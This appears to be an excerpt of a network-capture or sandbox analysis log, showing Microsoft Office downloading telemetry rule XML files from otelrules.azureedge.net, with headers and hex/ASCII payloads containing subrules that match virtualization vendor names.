                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115023Z-1657d5bbd48wd55zet5pcra0cg00000001yg000000005htr
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:23 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            103192.168.2.64984713.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:23 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:23 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:23 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 468
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                            ETag: "0x8DC582BB3EAF226"
                                                                                                                            x-ms-request-id: b0fdb72d-401e-0015-37ce-160e8d000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115023Z-1657d5bbd48xsz2nuzq4vfrzg800000001t000000000acpa
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:23 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            104192.168.2.64984613.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:23 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:23 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:23 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 472
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                            ETag: "0x8DC582BB650C2EC"
                                                                                                                            x-ms-request-id: d803a4ff-401e-0083-3904-17075c000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115023Z-1657d5bbd48wd55zet5pcra0cg00000001w000000000ahsz
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:23 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            105192.168.2.64984813.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:23 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:23 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:23 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 485
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                            ETag: "0x8DC582BB9769355"
                                                                                                                            x-ms-request-id: 8d3bec0a-601e-0070-32fe-16a0c9000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115023Z-1657d5bbd48762wn1qw4s5sd3000000001pg00000000h6km
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:23 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            106192.168.2.64984913.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:23 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:23 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:23 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 411
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                            ETag: "0x8DC582B989AF051"
                                                                                                                            x-ms-request-id: 8d044b15-901e-00ac-3902-17b69e000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115023Z-1657d5bbd48f7nlxc7n5fnfzh000000001h000000000c6a8
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:23 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            107192.168.2.64985013.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:24 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:24 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:24 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 470
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                            ETag: "0x8DC582BBB181F65"
                                                                                                                            x-ms-request-id: e72b6989-501e-005b-2b00-17d7f7000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115024Z-1657d5bbd48762wn1qw4s5sd3000000001t0000000009ya2
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:24 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            108192.168.2.64985113.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:24 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:24 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:24 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 427
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                            ETag: "0x8DC582BB556A907"
                                                                                                                            x-ms-request-id: 0377c3fc-101e-000b-65dc-165e5c000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115024Z-1657d5bbd48lknvp09v995n79000000001g000000000ck1s
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:24 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            109192.168.2.64985213.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:24 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:24 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:24 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 502
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                            ETag: "0x8DC582BB6A0D312"
                                                                                                                            x-ms-request-id: a5e58c1d-b01e-00ab-5ac9-16dafd000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115024Z-1657d5bbd48xdq5dkwwugdpzr0000000029g000000005utf
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:24 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            110192.168.2.64985313.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:24 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:24 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:24 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 407
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                            ETag: "0x8DC582B9D30478D"
                                                                                                                            x-ms-request-id: 78a0432a-701e-001e-1805-17f5e6000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115024Z-1657d5bbd48tnj6wmberkg2xy800000001zg00000000b0dg
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:24 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            111192.168.2.64985413.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:25 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:25 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:25 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 474
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                            ETag: "0x8DC582BB3F48DAE"
                                                                                                                            x-ms-request-id: ef9cab6f-f01e-0099-0d00-179171000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115025Z-1657d5bbd48xsz2nuzq4vfrzg800000001x0000000000vx0
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:25 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            112192.168.2.64985513.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:25 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:25 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:25 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 408
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                            ETag: "0x8DC582BB9B6040B"
                                                                                                                            x-ms-request-id: 2f519f63-901e-0016-75ff-16efe9000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115025Z-1657d5bbd487nf59mzf5b3gk8n00000001n0000000004utm
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
